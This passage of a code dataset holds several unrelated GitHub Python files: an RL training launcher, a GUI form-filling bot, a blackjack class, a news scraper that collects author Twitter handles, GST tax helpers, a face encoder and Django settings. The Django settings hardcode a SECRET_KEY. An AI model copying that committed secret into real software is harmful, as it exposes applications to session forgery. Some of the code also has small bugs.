nargs=\"+\",\n help=\"MLP hidden layer sizes. Enter like this: --layers 64 64. Makes MLP w/ 2 hidden layers w/ 64 nodes each.\",\n default=[64, 32],\n)\nparser.add_argument(\n \"-spe\",\n \"--steps_per_epoch\",\n type=int,\n help=\"How many env interactions per epoch\",\n default=4000,\n)\nparser.add_argument(\n \"-mbs\",\n \"--minibatch_size\",\n type=int,\n help=\"Minibatch size for training. Defaults to 4000, same as steps per epoch. Should be a multiple of steps per epoch.\",\n default=4000\n)\nparser.add_argument(\n \"-seed\",\n \"--seed\",\n type=int,\n help=\"Seed for agent and environment.\",\n default=0\n)\nparser.add_argument(\n \"-wandb\",\n \"--wandb\",\n action=\"store_true\",\n help=\"Whether to use weights and biases logger. Need to have weights and biases installed.\"\n)\nparser.add_argument(\n \"-project\",\n \"--project_name\",\n help=\"Project name for Weights and Biases logger.\",\n default = None\n)\nparser.add_argument(\n \"-run_name\",\n \"--run_name\",\n help=\"Name for run in plots. If None, defaults to algo_name/env_name/current_timestamp\",\n default = None\n)\n# get args from argparser\nargs = parser.parse_args()\n\n\nif __name__ == \"__main__\":\n # initialize training object. 
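Each algorithm's entry point is 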
defined in flare/algorithms.py\n    hids = tuple(int(i) for i in args.layers)\n    if args.alg == \"REINFORCE\":\n        pg.reinforce.learn(\n            args.env,\n            args.epochs,\n            steps_per_epoch=args.steps_per_epoch,\n            minibatch_size=args.minibatch_size,\n            hidden_sizes=hids,\n            gamma=args.gamma,\n            lam=args.lam,\n            seed=args.seed,\n            hparams=args\n        )\n    elif args.alg == \"PPO\":\n        pg.ppo.learn(\n            args.env,\n            args.epochs,\n            minibatch_size=args.minibatch_size,\n            steps_per_epoch=args.steps_per_epoch,\n            hidden_sizes=hids,\n            gamma=args.gamma,\n            lam=args.lam,\n            seed=args.seed,\n            hparams=args\n        )\n    elif args.alg == \"A2C\":\n        pg.a2c.learn(\n            args.env,\n            args.epochs,\n            steps_per_epoch=args.steps_per_epoch,\n            minibatch_size=args.minibatch_size,\n            hidden_sizes=hids,\n            gamma=args.gamma,\n            lam=args.lam,\n            seed=args.seed,\n            hparams=args\n        )\n    elif args.alg == \"DDPG\":\n        trainer = qpg.DDPG(\n            args.env,\n            gamma=args.gamma,\n            hidden_sizes=hids,\n            logger_dir=args.folder,\n            save_screen=args.save_screen,\n            save_states=args.save_states,\n            steps_per_epoch=args.steps_per_epoch,\n        )    \n    elif args.alg == \"TD3\":\n        trainer = qpg.TD3(\n            args.env,\n            gamma=args.gamma,\n            hidden_sizes=hids,\n            logger_dir=args.folder,\n            save_screen=args.save_screen,\n            save_states=args.save_states,\n            steps_per_epoch=args.steps_per_epoch,\n        )\n    elif args.alg == \"SAC\":\n        trainer = qpg.SAC(\n            args.env,\n            gamma=args.gamma,\n            hidden_sizes=hids,\n            logger_dir=args.folder,\n            save_screen=args.save_screen,\n            save_states=args.save_states,\n            steps_per_epoch=args.steps_per_epoch,\n        )\n\n","repo_name":"jfpettit/flare","sub_path":"flare/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4294,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"37663552122","text":"import pyautogui as pyag\nimport pymsgbox as pymsg\n\n\n\"\"\"Fills the \"grupo de destaque\" (highlight group) field of the client registration form, on the Complemento tab, from a\nspreadsheet. Fill by star rating and adjust the number of down presses to pick the group\n\"\"\"\npyag.PAUSE = 0.3\n\nqtd_cli = pymsg.prompt(text='Enter the number of clients')\nestrelas = pymsg.prompt(text='Enter the number of stars')\n\ncont = 0\n\n
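# NOTE: every screen coordinate below (e.g. x=63, y=267 for spreadsheet cell A2) assumes one specific screen layout\n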
confirma = pymsg.confirm(text='%s clients to process. \nStarting now! \nStay on the Excel sheet, with the client registration screen on the alt-tabbed window'%qtd_cli,\nbuttons=['Ok','Cancel'])\n\nif confirma == 'Cancel':\n    quit()\n\nelif confirma == 'Ok':\n\n    pyag.click(x=63,y=267, interval=0.3) #select cell A2 in the sheet\n    pyag.click(x=63,y=267, interval=0.15)\n\n\n    pyag.hotkey('ctrl','c') #copy the client code from the sheet\n    pyag.hotkey('alt','tab') #switch to the client registration screen in Target\n\n    while int(qtd_cli) > cont:\n\n        pyag.doubleClick(x=334, y=136) # client code field in Target\n        pyag.hotkey('ctrl','v')\n        pyag.hotkey('tab')\n        pyag.hotkey('alt','a')\n\n        pyag.click(x=964, y=432) #select the Complemento tab\n        \n        pyag.click(x=790, y=481, interval=0.15) #select the highlight group field\n        pyag.press('home') #go to the top of the combobox\n\n        pyag.press('down', presses=int(estrelas)) #choose the desired option (stars) in the highlight group\n        pyag.hotkey('tab')\n        pyag.hotkey('alt','e')\n        pyag.hotkey('alt','o', interval=0.1)\n\n\n        pyag.hotkey('alt','tab') #return to the sheet\n        pyag.press('right', presses=2)\n        pyag.write('x') #mark the client with an X as done \n        pyag.press('down')\n        pyag.press('home')\n        pyag.hotkey('ctrl','c')\n\n        pyag.hotkey('alt','tab')# return to Target\n        \n        cont += 1\n\n\n#highlight group position (x=790, y=481)\n#cell A2 position (x=63, y=267)\n\n\n\n","repo_name":"jefferschi/automacoes","sub_path":"preenche_grupo_destaque.py","file_name":"preenche_grupo_destaque.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8694659630","text":"from blackjack_package.deck_class import Deck\nfrom time import sleep\n\nclass Player:\n\n\t#Every player will have a hand of Cards and every table will have a deck\n\t#The hand variable refers to the values of a players hand of cards\n\t\n\tdeck = Deck()\n\n\tdef __init__(self, hand=None, name='default'):\n\t\tself.name = name\n\t\tself.hand = hand if hand is not None else []\n\n\tdef update_hand(self, num=1):\n\t\t#If num equals 1 then this method gets a card for player 1's hand else it gets a card for the computer's hand\n\t\tif(num == 1):\n\t\t\tprint('Getting a card from the deck...')\n\t\t\tpiece = Player.deck.get_card_value()\n\t\t\tsleep(1)\n\t\t\tprint(f'The card you got is a {piece}')\n\t\t\tself.hand.append(piece)\n\t\telse:\n\t\t\tprint('Getting a card from the deck...')\n\t\t\tself.hand.append(Player.deck.get_card_value())\n\n\tdef greeting(self):\n\t\treturn f'Hello {self.name}, Welcome to Blackjack!\\n\\nNote: You and the dealer will both start with 2 cards but you will only be able to see one of the dealers cards.\\n'\n\tdef get_value(self):\n\t\ttmp = []\n\t\tvalue = 0\n\t\tfor piece in self.hand:\n\t\t\tif(piece == 'ace'):\n\t\t\t\ttmp.append('ace')\n\t\t\telif(piece == 'jack' or piece == 'queen' or piece == 'king'):\n\t\t\t\tvalue += 10\n\t\t\telse:\n\t\t\t\tvalue += piece\n\t\tif(len(tmp)>0):\n\t\t\tif(value <= 11-len(tmp)):\n\t\t\t\tvalue = value + 11 + len(tmp) - 1\n\t\t\telse:\n\t\t\t\tvalue += len(tmp)\n\n\t\treturn value\n\n\tdef reset(self):\n\t\tPlayer.deck.reset_deck()\n\t\tself.hand.clear()\n\n\n\tdef display_hand(self, num=1):\n\t\t#If num equals 1 then this method displays player 1's hand else it displays the computer's hand\n\t\t#If num equals 2 then this method displays only the first card of the computer's hand\n\t\tif(num == 1):\n\t\t\tprint(f'Your hand consists of {self.hand} and the value of your hand is {self.get_value()}')\n\t\telif(num == 2):\n\t\t\tprint(f\"The computer's hand consists of {self.hand[0]} plus 
another card which is face down.\")\n\t\telse:\n\t\t\tprint(f\"The computer's hand consists of {self.hand} and has a value of {self.get_value()}\")\n\n\n\n\n","repo_name":"Satya191/blackjack_project","sub_path":"blackjack_package/player_class.py","file_name":"player_class.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40807217932","text":"# website text extraction\nimport feedparser\nimport subprocess\nimport os\nimport math\nimport re\nimport html2text\nimport requests\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport sqlite3\nfrom sqlite3 import Error\nimport time\nimport datetime\nimport articleDateExtractor\n\n\n# globally set driver to use later for taking screenshot of homepage\n# recommendation: Selenium is deprecated, use another package in the future\ndriver = webdriver.PhantomJS()\ndriver.set_window_size(1024, 768)\n\n\n# Display article_data table from the database\ndef display_article_data(conn):\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM article_data\")\n rows = cur.fetchall()\n for row in rows:\n print(row)\n\n\n# RSS Feed extraction: not in use, but could be helpful later\ndef rss_feed(url):\n rss = feedparser.parse(url)\n cols = rss.entries[1].keys()\n print('RSS info available', cols)\n\n print('\\nNumber of RSS posts : ' + str(len(rss.entries)) + '\\n\\n')\n\n for i in range(1,len(rss.entries)):\n print('Title: ' + str(rss.entries[i].title) + '\\n' + 'Link: ' + \n str(rss.entries[i].link) + '\\n\\n')\n return\n\n\n# Checks that a url is valid and does not return an error\ndef is_valid_url(url):\n try:\n url_page = requests.get(url)\n except:\n return False\n return True\n\n\n# Checks that a Twitter account for the given handle exists\ndef is_valid_handle(handle):\n try:\n url_page = requests.get('https://twitter.com/' + handle)\n except:\n return False\n return True\n\n\n# Takes a screenshot of home page\ndef save_screenshot(url, direct_site, site_key):\n driver.save_screenshot(direct_site + site_key + '.png')\n\n\n# get plain text of an article\ndef get_preview(soup_article):\n h = html2text.HTML2Text()\n h.ignore_links = True # comment out if you want links\n h.ignore_images = True # comment out if you want images\n return h.handle(str(soup_article).decode('utf-8'))\n\n\n# Create local directories for a given site\ndef save_homepage(url, site_key):\n if not os.path.exists(os.path.join(os.path.dirname(__file__), site_key+'/')):\n # create the local folder for the site if it does not already exist\n os.makedirs(os.path.join(os.path.dirname(__file__), site_key+'/'))\n driver.get(url)\n direct_site = os.path.join(os.path.dirname(__file__), site_key + '/')\n # save screenshot of homepage to {site_key}/\n save_screenshot(url, direct_site, site_key)\n page = requests.get(url)\n # parse homepage and save as HTML\n soup = BeautifulSoup(page.text)\n # save parsed homepage to {site_key}/\n w = open(direct_site + 'parsedHomepage.txt', 'w+')\n w.write(str(soup))\n w.close()\n # return soup of the homepage\n return soup\n\n\n# Takes a list of article links, loops through and saves HTML in a text file for each\ndef write_articles(url, articleLinks, site_key, folder, cur, conn):\n # keep count variable for identification of articles in their names\n # note: this implementation rewrites the folder every time - can be changed later to save all history\n count = 1\n for article in articleLinks:\n # loop through the list of article links stripped from 
homepage\n        if (is_valid_url(article)):\n            try:\n                page_article = requests.get(article)\n            except:\n                print(article + \" caused a problem!\")\n                continue # moves on to the next article link\n            soup_article = BeautifulSoup(page_article.text)\n            # saves the HTML to the folder with the given naming convention\n            w = open(folder + site_key + str(count) + '.txt','w+')\n            w.write(str(soup_article))\n            w.close()\n            count += 1\n    # call the authors function to save author(s) + Twitter handle(s) to database\n    # this function does the majority of the extraction work\n    insert_authors_articles(url, site_key, articleLinks, cur, conn)\n\n\n# Scrapes the homepage and finds all (potential) article links\ndef find_articles(url, site_key, soup, cur, conn):\n    # create directory if it doesn't exist\n    folder = os.path.join(os.path.dirname(__file__), site_key + '/articles/')\n    if not os.path.exists(folder):\n        os.makedirs(folder)\n    else: # clear the directory to write new files\n        for article in os.listdir(folder):\n            file_path = os.path.join(folder, article)\n            try:\n                if os.path.isfile(file_path):\n                    os.unlink(file_path)\n            except Exception as e:\n                print(e)\n\n    if site_key == 'cnn': # implementation as of March 2019\n        # for CNN: the div class \"cd__content\" usually holds the a href for article\n        # but this is not shown in the html.parser, instead they're in {\"uri\": /link/}\n        # note: they're all under {articleList: [list of articles]}\n        # use regular expressions to extract url value for 'uri' attribute:\n        articleList = re.search('(?<=(\"articleList\":)).+?(?=}])', str(soup)).group(0)\n        # get all the urls\n        articleLinks = re.findall('((?<=(\"uri\":\")).+?(?=\"))', articleList)\n        articleLinks = [x for x, y in articleLinks]\n        articleLinks = [(url+x) if x[0]=='/' else x for x in articleLinks]\n\n        # go into each of these links and get links / references, also save and clean text\n        # save each article to {site_key}/articles/, author info to db\n        write_articles(url, articleLinks, site_key, folder, cur, conn)\n        \n    elif site_key == 'foxnews': # implementation as of March 2019\n        # Fox News is formatted differently from CNN, some articles may have been missed\n        # took the ones that had header class=\"title\"\n        # print(str(soup))\n        articleList = re.findall(r'class=\"title\"><a href=\"(.+?)\">', str(soup))\n        # print('articleList: ')\n        # print(articleList)\n        # get rid of all special characters at beginning of string\n        articleLinks = [re.sub(r'^\\W+', 'https://', x) for x in articleList]\n        articleLinks = [x for x in articleLinks if \"www.\" in x]\n        # print(articleLinks)\n        # save each article to {site_key}/articles/, author info to db\n        write_articles(url, articleLinks, site_key, folder, cur, conn)\n\n    else:\n        # implementation as of April 2019\n        # create generalized process for other sites (keeping CNN and Fox News because already implemented)\n        # go from specific -> general, FUTURE WORK: keep adding footprints here\n        if (url == \"https://cnbc.com/politics\"):\n            url = \"https://cnbc.com\" # cnbc specific case because of how the links are extracted\n        if (len(re.findall('((?<=(\"type\":\"article\",\"link\":\")).+?(?=\"))', str(soup))) != 0):\n            articleList = re.findall('((?<=(\"type\":\"article\",\"link\":\")).+?(?=\"))', str(soup))\n        elif (len(re.findall('((?<=(href=\")).+?(?=\"\\stitle=))', str(soup)))):\n            articleList = re.findall('((?<=(href=\")).+?(?=\"\\stitle=))', str(soup))\n        elif (len(re.findall('((?<=(href=\")).+?(?=\">))', str(soup)))):\n            articleList = re.findall('((?<=(href=\")).+?(?=\">))', str(soup))\n        
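# each branch above is just a site-specific \"footprint\" regex over the raw HTML;\n        # supporting a new site generally means adding another href pattern here\n        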
# clean article list\n        articleList = [x for x,y in articleList]\n        # remove any backslashes / misc. characters\n        articleList = [x.replace(\"\\\\u002F\", \"/\") for x in articleList]\n        articleList = [x.replace(\"\\\\\", \"/\") for x in articleList]\n        articleList = [x.replace(\"//\", \"/\") for x in articleList]\n        articleLinks = [(url+x) if (x[0]=='/') else x for x in articleList]\n\n        # print(articleLinks)\n\n        # call write_articles to save all the content from each link to a file in the directory\n        write_articles(url, articleLinks, site_key, folder, cur, conn)\n\n\n# Scrapes all the information from each of the articles and adds to database\ndef insert_authors_articles(url, site_key, articleLinks, cur, conn):\n    # iterate through the site_key's directory of articles\n    for article in articleLinks:\n        # check that the link is valid before opening and saving\n        # if invalid, skip to next URL\n        if not is_valid_url(article):\n            continue\n        \n        page_article = requests.get(article)\n        soup_article = BeautifulSoup(page_article.text)\n        \n        if site_key == 'cnn': # implementation as of March 2019, specific to CNN\n            # get title of article\n            title = re.search('(?<=(<title>)).+?(?=</title>)', str(soup_article))\n            if (title is not None):\n                title = title.group(0)\n            else:\n                continue\n            # get category of article\n            category = re.search('(?<=(meta content=\"https://www.cnn.com/)).+?(?=\")', str(soup_article))\n            if (category is not None):\n                category = category.group(0)\n                if (category[0:6] == \"videos\"):\n                    category = category[7:].split('/')[0]\n                    if (category[0].isdigit()):\n                        category = None\n                else:\n                    category = category[11:].split('/')[0]\n            # get the date it was written\n            date_written = articleDateExtractor.extractArticlePublishedDate(article)\n            if date_written is not None:\n                # note: the publish times seem to be fairly inaccurate, only take year/month/day\n                date_written = date_written.strftime('%Y-%m-%d')\n                # this is the current date, to check if date written extracted correctly\n                ts = time.time()\n                date_current = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d')\n                # note: the following date/year cutoff can change - I'm assuming that if the year is\n                # older than 5 years, it likely would not have shown up on the front page \n                # if date is not in a valid range [date_cutoff_low, current_time)\n                date_cutoff_low = 2015\n                if (int(date_written[0:4]) < date_cutoff_low or date_written > date_current):\n                    date_written = None # date will be inserted as NULL\n            # get content of the article\n            content = get_preview(soup_article)\n\n            # extract author string from HTML\n            # clean to get one name (take everything after 'by', separate by 'and')\n            # Note: make sure 'by' and 'and' are NOT case-sensitive\n            authorList = re.search('(?<=(\"author\":\")).+?(?=\")', str(soup_article))\n            if (authorList is not None): # in this I'm only adding to database articles with authors\n                authorList = authorList.group(0)\n                authors = re.split('by ', authorList, flags=re.IGNORECASE)\n                if len(authors) >= 2:\n                    authors = authors[1:]\n                authors = re.split(' and ', ','.join(authors), flags=re.IGNORECASE)\n                authors = re.split(',', ','.join(authors))\n                # special case for CNN - CNN will show up in the author list\n                authors = [x for x in authors if \"CNN\" not in x]\n                # additional cleaning\n                authors = [x for x in authors if x != '\"' and x != '']\n\n                # format for CNN: \"profileUrl\":\"/profiles/*****\"\n                links = re.findall('((?<=(\"profileUrl\":\")).+?(?=\"))', str(soup_article))\n                links = [x for x,y in links]\n                links = [(url+x) if x[0]=='/' else x for x in links]\n\n                # if the length of the authors list equals list of available links and it's not empty\n                # note: I have 
this equality restriction imposed for simplicity of making sure authors match up with profiles\n # this is further explained in report\n if (len(authors) == len(links) and len(authors) != 0):\n # store everything in a dictionary - only did this for CNN, leaving in case it's helpful later\n authorInfo = {}\n for i in range(0,len(links)):\n # match author with link\n author = authors[i]\n authorInfo[author] = {}\n authorInfo[author][\"link\"] = links[i]\n if (is_valid_url(links[i])):\n author_page = requests.get(links[i])\n author_soup = BeautifulSoup(author_page.text)\n handle = author_soup.find('div', attrs={'class': 'social-description__follow-icon social-description__follow-icon--twitter cnn-icon'})\n if (handle is not None):\n handle = handle.find('a')['href']\n handle = handle[14:]\n if (handle[0] == '@' or handle[0] == '/'):\n handle = handle[1:]\n if '.' in handle: # this is not a valid handle!\n handle = None\n if (is_valid_handle(handle)):\n authorInfo[author][\"handle\"] = handle\n else:\n authorInfo[author][\"handle\"] = None\n else:\n authorInfo[author][\"handle\"] = None\n\n # loop through dictionary and add to database\n for author in authorInfo:\n # for now, only insert if a handle exists, since we're using it as the primary key\n if (authorInfo[author][\"handle\"] is not None):\n # add all extracted values into article_data\n cur.execute('INSERT OR IGNORE INTO article_data (article_link, article_date, author_name, author_handle, site, article_title,'\n ' category, text_preview) VALUES (?,?,?,?,?,?,?,?)', (article, date_written, author, authorInfo[author][\"handle\"], site_key, title, category, content))\n\n else: # any other website - generalized implementation\n if (url == \"https://cnbc.com/politics\"):\n url = \"https://cnbc.com\" # cnbc specific case, because I used the politics section\n # FIRST: find handle on the article page, if it exists\n # get the date it was written\n date_written = articleDateExtractor.extractArticlePublishedDate(article)\n if date_written != None:\n # note: the publish times seem to be fairly inaccurate, only take year/month/day\n date_written = date_written.strftime('%Y-%m-%d')\n # this is the current date, to check if date written extracted correctly\n ts = time.time()\n date_current = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d')\n # note: the following date/year cutoff can change - I'm assuming that if the year is\n # older than 5 years, it likely would not have shown up on the front page \n # if date is not in a valid range [date_cutoff_low, current_time)\n date_cutoff_low = 2015\n if (date_written[0:3] < date_cutoff_low or date_written > date_current):\n date_written = None # date will be inserted as NULL\n # get content of the article\n content = get_preview(soup_article)\n # initialize empty lists for handles and authors\n handleList = []\n authorList = []\n # footprints listed below for handle extraction - can add more for higher success rate\n if (len(re.findall('(?i)((?<=(on Twitter )).+?(?=))', str(soup_article))) != 0):\n authorList = re.findall('(?i)((?<=(\"url\" rel=\"author\">)).+?(?=))', str(soup_article))\n elif (len(re.findall('(?i)((?<=(\"Person\",\"name\":\")).+?(?=\"))', str(soup_article))) != 0):\n authorList = re.findall('(?i)((?<=(\"Person\",\"name\":\")).+?(?=\"))', str(soup_article))\n \n # remove duplicates if they exist\n authorList = [x for x,y in authorList]\n authorList = list(dict.fromkeys(authorList))\n\n # clean authors\n newAuthorList = []\n if (len(authorList) != 0): # in this project I'm only 
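# The helpers is_valid_url() and is_valid_handle() called throughout this record are
# defined elsewhere in the source repository; plausible minimal stand-ins (assumptions,
# shown only to keep the excerpt self-contained) could look like:
import re
def is_valid_url(url):
    return bool(url) and re.match(r'https?://\S+$', url) is not None
def is_valid_handle(handle):
    # Twitter handles: 1-15 word characters, no dots or slashes
    return bool(handle) and re.fullmatch(r'\w{1,15}', handle) is not None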
adding articles with authors\n for i in range(len(authorList)):\n print(authorList[i])\n authors = re.split('by ', authorList[i], flags=re.IGNORECASE)\n if len(authors) >= 2:\n authors = authors[1:]\n authors = re.split(' and ', ','.join(authors), flags=re.IGNORECASE)\n authors = re.split(',', ','.join(authors))\n for j in range(len(authors)):\n newAuthorList.append(authors[j])\n authorList = newAuthorList\n\n # if handle has not been found yet, go into author profile page\n if len(newAuthorList) != len(handleList):\n # find author profile page if it exists, go find handle there\n # can and should add more footprints here - many other ways to get the author's profile page\n authorLinks = []\n handleList = []\n if (len(re.findall('(?i)((?<=(href=\"/author/)).+?(?=\"))', str(soup_article))) != 0):\n authorLinks = re.findall('(?i)((?<=(href=\"/author/)).+?(?=\"))', str(soup_article))\n authorLinks = [url+\"/author/\"+x for x,y in authorLinks]\n elif (len(re.findall('(?i)((?<=(GST Documentation')\n\n\t\t\tfrappe.throw(msg)\n\n\ndef update_itc_availed_fields(doc, method):\n\tcountry = frappe.get_cached_value('Company', doc.company, 'country')\n\n\tif country != 'India':\n\t\treturn\n\n\t# Initialize values\n\tdoc.itc_integrated_tax = doc.itc_state_tax = doc.itc_central_tax = doc.itc_cess_amount = 0\n\tgst_accounts = get_gst_accounts(doc.company, only_non_reverse_charge=1)\n\n\tfor tax in doc.get('taxes'):\n\t\tif tax.account_head in gst_accounts.get('igst_account', []):\n\t\t\tdoc.itc_integrated_tax += flt(tax.base_tax_amount_after_discount_amount)\n\t\tif tax.account_head in gst_accounts.get('sgst_account', []):\n\t\t\tdoc.itc_state_tax += flt(tax.base_tax_amount_after_discount_amount)\n\t\tif tax.account_head in gst_accounts.get('cgst_account', []):\n\t\t\tdoc.itc_central_tax += flt(tax.base_tax_amount_after_discount_amount)\n\t\tif tax.account_head in gst_accounts.get('cess_account', []):\n\t\t\tdoc.itc_cess_amount += flt(tax.base_tax_amount_after_discount_amount)\n\ndef update_taxable_values(doc, method):\n\tcountry = frappe.get_cached_value('Company', doc.company, 'country')\n\n\tif country != 'India':\n\t\treturn\n\n\tgst_accounts = get_gst_accounts(doc.company)\n\n\t# Only considering sgst account to avoid inflating taxable value\n\tgst_account_list = gst_accounts.get('sgst_account', []) + gst_accounts.get('sgst_account', []) \\\n\t\t+ gst_accounts.get('igst_account', [])\n\n\tadditional_taxes = 0\n\ttotal_charges = 0\n\titem_count = 0\n\tconsidered_rows = []\n\n\tfor tax in doc.get('taxes'):\n\t\tprev_row_id = cint(tax.row_id) - 1\n\t\tif tax.account_head in gst_account_list and prev_row_id not in considered_rows:\n\t\t\tif tax.charge_type == 'On Previous Row Amount':\n\t\t\t\tadditional_taxes += doc.get('taxes')[prev_row_id].tax_amount_after_discount_amount\n\t\t\t\tconsidered_rows.append(prev_row_id)\n\t\t\tif tax.charge_type == 'On Previous Row Total':\n\t\t\t\tadditional_taxes += doc.get('taxes')[prev_row_id].base_total - doc.base_net_total\n\t\t\t\tconsidered_rows.append(prev_row_id)\n\n\tfor item in doc.get('items'):\n\t\tproportionate_value = item.base_net_amount if doc.base_net_total else item.qty\n\t\ttotal_value = doc.base_net_total if doc.base_net_total else doc.total_qty\n\n\t\tapplicable_charges = flt(flt(proportionate_value * (flt(additional_taxes) / flt(total_value)),\n\t\t\titem.precision('taxable_value')))\n\t\titem.taxable_value = applicable_charges + proportionate_value\n\t\ttotal_charges += applicable_charges\n\t\titem_count += 1\n\n\tif total_charges != 
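# The taxable-value block above distributes "additional_taxes" across items in
# proportion to their net amounts, then pushes any rounding remainder onto the last
# item so the parts sum back to the total. A minimal standalone sketch of that
# allocation pattern:
def allocate(total, weights, ndigits=2):
    parts = [round(total * w / sum(weights), ndigits) for w in weights]
    parts[-1] += round(total - sum(parts), ndigits)  # absorb rounding drift
    return parts
# e.g. allocate(10, [1, 1, 1]) -> [3.33, 3.33, 3.34]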
additional_taxes:\n\t\tdiff = additional_taxes - total_charges\n\t\tdoc.get('items')[item_count - 1].taxable_value += diff\n","repo_name":"DeeMysterio/uae_compliance","sub_path":"uae_compliance/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10587,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8168936785","text":"\r\n# secrets.py\r\n\r\n# Import the configparser library\r\nimport configparser\r\n\r\n# Create a new ConfigParser object\r\nconfig = configparser.ConfigParser()\r\n\r\n# Read the secrets.ini file\r\nconfig.read('secrets.ini')\r\n\r\n# Create a dictionary called 'secrets'\r\nsecrets = config['apikey']\r\n\r\n# Retrieve the API key\r\napi_key = secrets['api_key']\r\n\r\n# 4. Import the secrets.py file into your main.py file.\r\n# 5. Use the api_key variable to access your API key.\r\n# 6. Add the secrets.ini and secrets.py files to your .gitignore file.\r\n# 7. Push your code to GitHub.\r\n# 8. Create a new repository on GitHub called weather-app.\r\n# 9. Push your code to the new repository.\r\n# 10. Create a new branch called secrets.\r\n# 11. Push your code to the secrets branch.\r\n# 12. Create a pull request to merge the secrets branch into the master branch.\r\n# 13. Merge the pull request.\r\n# 14. Delete the secrets branch.\r\n","repo_name":"gulshanrana10/Weather-forecast-app","sub_path":"secrets.py","file_name":"secrets.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74049726889","text":"import cv2 as cv\nimport face_recognition\nimport pickle\nimport os\n# dataPath=\"data\"\ndataPath=\"data\"\n\ndataList=os.listdir(dataPath)\n\nprint(dataList)\nimgList=[]\nstudentIDs=[]\nfor img in dataList:\n # print(os.path.join(dataPath,img))\n imgList.append(cv.imread(os.path.join(dataPath,img)))\n # print(os.path.splitext(img))\n # print(os.path.splitext(img)[0])\n studentIDs.append(os.path.splitext(img)[0])\nprint(\"studentIDs : \",studentIDs)\n\n# making encode of images\ndef findEncodings(imgList):\n encodeList=[]\n for img in imgList:\n img=cv.cvtColor(img,cv.COLOR_BGR2RGB)\n encode=face_recognition.face_encodings(img)[0]\n encodeList.append(encode)\n return encodeList\n\n\ndef myencoder():\n print(\"encoding started...\")\n knownEncodeList=findEncodings(imgList)\n print(\"encoding completed\")\n\n filename='encoder/EncodeFile.p'\n if os.path.exists(filename):\n # Delete the file\n os.remove(filename)\n\n model=[knownEncodeList,studentIDs]\n file=open(filename,\"wb\")\n pickle.dump(model,file)\n file.close()\n print(\"Model Saved\")\n\nif __name__ == \"__main__\":\n print(\"--------encoder.py-------\")","repo_name":"bilalansar3/FRS-face-recognition-system","sub_path":"encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7528098089","text":"# -*- coding: UTF-8 -*-\n\n#===============================================================================\n# Author: 骛之\n# File Name: ouds/settings.py\n# Revision: 0.1\n# Date: 2007-2-5 17:48\n# Description: settings.\n#===============================================================================\n\nDEBUG = False\n\nTEMPLATE_DEBUG = False\n\nADMINS = (\n #(u'长弓骛之', 'ourunix@gmail.com'),\n)\n\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 
'oudsus_blog',\n 'USER': 'oudsus',\n 'PASSWORD': '',\n 'HOST': '',\n 'PORT': '',\n }\n}\n\nTIME_ZONE = 'Asia/Shanghai'\n\nLANGUAGE_CODE = 'zh-cn'\n\nSITE_ID = 1\n\nUSE_I18N = True\n\nLOCALE_PATHS = (\n '/home/oudsus/Ouds/blog/locale',\n)\n\nLANGUAGES = (\n ('zh-cn', '简体中���'),\n ('zh-tw', '繁體中文'),\n ('en', 'English'),\n ('de', 'Deutsch'),\n ('fr', 'Français'),\n ('it', 'Italiano'),\n ('pt', 'Português'),\n ('es', 'Español'),\n ('sv', 'Svenska'),\n ('ru', 'Русский'),\n ('jp', '日本語'),\n ('ko', '한국어'),\n)\n\nMEDIA_ROOT = '/home/oudsus/Ouds/blog/media'\n\nADMIN_MEDIA_PREFIX = '/media/admin/'\n\nSECRET_KEY = '%zg$h*ibw9t3by1t#bm58jn2&i*^u8@0nu30ow=jw1u-pe93s)'\n\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.load_template_source',\n 'django.template.loaders.app_directories.load_template_source',\n )\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n #'django.middleware.cache.CacheMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.middleware.doc.XViewMiddleware',\n )\n\nROOT_URLCONF = 'ouds.urls'\n\nTEMPLATE_DIRS = (\n '/home/oudsus/Ouds/blog/templates',\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.admin',\n \n 'ouds.utils',\n 'ouds.blog',\n)\n\n#=====================================\n# extend settings\n#=====================================\n\nTEMPLATE_STRING_IF_INVALID = \"Ouds.biz\"\nHOST_URL = 'http://Ouds.biz'\n\nSESSION_COOKIE_AGE = 60 * 30 # 30 minutes\n\n#CACHE_BACKEND = 'locmem:///'\n#CACHE_MIDDLEWARE_ANONYMOUS_ONLY = True\n#CACHE_MIDDLEWARE_SECONDS = 60 * 5 # 5 minutes\n#CACHE_MIDDLEWARE_KEY_PREFIX = 'ouds'\n\n#===============================================================================\n# logging\n#===============================================================================\n\n#import logging\n\n#FORMAT='[%(asctime)s] %(levelname)s\\t%(message)s'\n#formatter = logging.Formatter(FORMAT)\n#logging.basicConfig(format=FORMAT, level=logging.DEBUG)\n","repo_name":"zzy/ouds-blog","sub_path":"src/settings_vps.py","file_name":"settings_vps.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"15749518294","text":"# import the necessary packages\nfrom imutils import face_utils\nimport scipy\nimport 